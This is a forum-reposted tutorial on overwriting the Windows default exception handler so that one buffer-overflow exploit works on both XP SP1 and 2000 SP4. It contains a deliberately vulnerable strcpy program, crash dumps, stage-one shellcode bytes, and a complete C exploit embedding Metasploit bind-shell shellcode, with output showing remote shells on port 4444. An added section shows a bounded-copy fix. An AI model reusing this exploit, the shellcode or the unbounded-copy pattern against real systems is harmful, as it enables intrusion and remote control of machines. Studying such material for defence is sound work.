Exploiting Default Exception Handler to Increase Exploit Sta

韩冰        

Posted 2004-11-19 10:39
The goal of this method is to create a stable exploit that successfully exploits a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler located at the end of the stack. When exploiting a normal buffer overflow we overwrite the return address; in this case we keep overwriting the stack past the return address and overwrite the default exception handler as well.

[Buf] <- Shellcode
[Return Address] <- jmp register (for Windows XP SP1)
[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k SP4)
[Stage1 Shellcode] <- stage1 shellcode for Win2k

If the first return address (Windows XP SP1) is wrong, an exception occurs and the default exception handler is called (Windows 2000 SP4). This lets us create a stable exploit with two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac

Vulnerable Code:
//lamebuf.c
#include<stdio.h>
#include<string.h>
#include<windows.h>

int main(int argc,char *argv[]){
    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }

    strcpy(buf,argv[1]); // unbounded copy of argv[1] into a 512-byte stack buffer: this is the overflow
    return 0x0;
}

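For contrast, here is a bounded replacement for the strcpy() in lamebuf.c. This is an added example and not code from the original post: copy_arg() refuses any argument that does not fit in the destination (including the terminator), so the 1600-byte input used below is rejected instead of overwriting the return address and the SEH record. The names copy_arg, handle_arg, bounded_len and BUF_SIZE are my own.

```c
/* Added example (not from the original post): bounded copy in place of the
 * strcpy(buf, argv[1]) from lamebuf.c. Names are hypothetical. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same stack buffer size as lamebuf.c */

/* Length of s, scanning at most max bytes so an unterminated source
 * cannot be read past the limit (a local stand-in for strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Copy src into dst (capacity dstsz) only if it fits including the NUL.
 * Returns the number of bytes copied on success, or -1 if src is too long. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t n;
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    n = bounded_len(src, dstsz);
    if (n == dstsz)            /* no room for the terminator: reject */
        return -1;
    memcpy(dst, src, n + 1);   /* bounded copy, terminator included */
    return (int)n;
}

/* Same shape as lamebuf.c's main(), but the copy is bounded.
 * Returns -1 on a NULL argument, 1 if the argument was rejected as too
 * long, 0 if it was copied. */
int handle_arg(const char *arg)
{
    char buf[BUF_SIZE];
    if (arg == NULL)
        return -1;
    if (copy_arg(buf, sizeof(buf), arg) < 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return -1;
    }
    return handle_arg(argv[1]);
}
```

With this in place the 1600-byte input from the "Getting Started" run returns 1 and never touches the saved return address, and nothing on the stack above buf (including the default exception handler record) is reachable from argv[1].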
Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.

Primary Return Address (Windows XP SP1 EN):
The first return address is called as in a normal stack overflow. We can see that ESP points to user input, so we use that as our first-stage shellcode. The return address is 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first-stage shellcode is:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address is called as in a normal SEH return. The return address is 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first-stage shellcode is:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

Proof Of Concept:
// exploit.c
// Tal zeltzer - [Double Return] //

#include<stdio.h>
#include<string.h>
#include<windows.h>

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";


int main(int argc,char *argv[]){

    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf,0x0,sizeof(buf));
    memset(buf,0x90,1652);
    memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

    memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
    memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode (stage1_2)

    *(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en


    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0],bufExe,NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

Powered by Discuz! X2.5 © 2001-2013 数学建模网-数学中国